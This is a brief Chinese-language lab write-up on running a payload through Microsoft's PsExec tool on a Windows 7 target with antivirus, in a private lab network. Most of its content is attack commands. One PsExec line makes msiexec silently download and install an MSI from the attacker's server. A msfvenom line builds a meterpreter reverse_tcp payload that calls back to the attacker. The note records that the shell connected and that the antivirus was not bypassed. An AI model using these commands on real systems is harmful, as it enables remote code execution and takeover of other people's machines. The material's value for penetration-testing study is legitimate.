0x00 PsExec 简介:
微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性
0x01 环境
攻击机 kali 192.168.5.100
靶机 win7 192.168.5.101
装有av
0x02复现
攻击机
靶机
PsExec.exe -d -s msiexec.exe /q /i http://192.168.5.100/shellcode.msi
shell弹回
0x03 shellcode.msi
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f msi > shellcode.msi
启用80监听
0x04 总结
不过AV。psexec.exe需下载,解压在命令行运行即可,地址
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
0x05 借鉴
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/83_基于白名单PsExec执行payload第十三季.html